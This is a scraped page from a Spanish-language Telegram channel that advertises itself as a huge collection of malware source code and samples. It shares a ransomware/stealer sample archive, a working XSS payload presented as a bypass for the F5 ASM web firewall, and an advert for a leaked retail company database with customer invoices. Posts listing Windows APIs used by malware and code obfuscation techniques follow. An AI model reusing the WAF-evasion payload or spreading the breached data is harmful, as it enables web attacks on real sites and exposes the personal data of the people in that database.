Malware X
198 subscribers
412 photos
22 videos
196 files
462 links
The largest collection of malware source code, samples, and papers on the internet.

98,000,000 of all kind of Virus.

Hosted by Pr@fEsOr X
Download Telegram
MercurialStealer.7z
911.5 KB
MercurialStealer Ransomware - Sample 👍
Forwarded from Deleted Account
Un payload XSS que permite saltarnos F5 ASM.

@str0d

str0d"/><style>

@KeyframeS

x{}</style><str style="animation-name:x;" onanimationend="alert.bind()(22)"></str>
°°°°°°°°°°°°°°°°°°
👍 #x25hackingnews #xss #hacking
Un desensamblador de código de bytes de Python que ayuda a los ingenieros inversos a diseccionar binarios de Python al desensamblar y analizar los archivos de código de bytes (.pyc) de Python compilados en todas las versiones de Python (incluida Python 3.10.*)
👇👇👇👇👇👇👇👇👇
Forwarded from Deleted Account
Este sitio ah sido hackeado y puesta en internet su base de datos y código fuente
+((++++++++
ABFRL DB + Source code & Invoice (PAN)
++++++++++

Si quieres conocer más a cerca de ADITYA
👇
Source: https://www.abfrl.com/about/

Wikipedia:
--------------- https://en.wikipedia.org/wiki/Aditya_Birla_Fashion_and_Retail

DB | size - 38GB

MD5-Salt: S8wcfPqfN2HTmMCG1O0f5LDGN1XnfYqvuGTYZE2FR0qkT1LKmvuuHc1R

S#LEAK 👍
Two REvil Member's Detenidos y puestos en el bote.
--------------
Por eso sres a cuidarse si hace cosas malas.
°°°°°°°°°°°°°
#Vxundergound info
Forwarded from Deleted Account
Muchos me han preguntado
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Cuáles serían las API de sistema operativo que usan más los malware?

Bueno pues sobre esto les podría decir lo siguiente.

Las 10 APIs más utilizadas, con un gran escalón respecto al resto, son las siguientes:

#1  GetProcAddress         
#2  LoadLibraryA          
#3  GetModuleHandleA     
#4  ExitProcess            
#5  VirtualAlloc   
#6  WriteFile     
#7  GetModuleFileNameA 
#8  CloseHandle 
#9  RegCloseKey 
#10 VirtualFree
#11 WinInet
+++++++++++
Ya les puse 11 pero bueno estás según eh visto son las más usadas,. Cabe aclarar que hay más .

En breve daremos varios ejemplos de su uso en los malware.

#x25hackingnews #Pr@fEsOrX #forensia
👍👌
MUCHOS ME HAN PREGUNTADO no. 2
###############
Cuántos métodos existen de ofuscación de código?

👉 Sobre esto les podría decir basados en lo que he hecho en cuestión de ofuscación de código como sistemas de protección de software y malware.
°°°°°°°°°°°°°°°°°°°°

NOTA: Aquí solo pondré las técnicas, si gustan leer más de ellas, los invito a qué visiten mi blog.
----------_-----------

👉 1.- • Cifrado de cadenas (codificar cadenas en el programa).

👉 2.- • Descifrado en línea (descifra las cadenas cifradas.

👉 3.- • Control de flujo (modificando los métodos dentro del código para que los descompiladores no puedan descompilar los métodos).

👉 4.- • Confusión de enteros (esta opción agregará cálculos dentro de todos los enteros).

👉 5.- • Cálculos matemáticos (esto agrega aritmética dentro de todas las constantes).

👉 6.- • Campos constantes (convierte todas las constantes en los campos con nombres seleccionados al azar).

👉 7.- • Campos locales (convierte todos los locales en campos con nombres seleccionados al azar).

👉 8.- • Calli Conversion (convierte todas las llamadas y cálculos en cálculos de calli, lo cual hace que sea más difícil identificar fácilmente qué está haciendo la función.

👉 9.- • Cadenas de proxy (oculta las referencias de cadenas a las que se hizo referencia a un tipo, método o campo).

👉 10.- • Constantes de proxy (oculta las referencias constantes a las que se hizo referencia a un tipo, método o campo).

👉 11.- • Si quieren ver las demás visiten mi blog ahí vienen explicadas. 😁

https://rodolfohbaz.blogspot.com/2020/12/20-tecnicas-de-ofuscacion-usadas-en.html

--------------------------

Estas son algunas de las técnicas que se pueden usar en combinación para hacer mas difícil el crackeo de programas .net con ofuscación de código.

#x25hackingnews #profesorx #wjethackingtools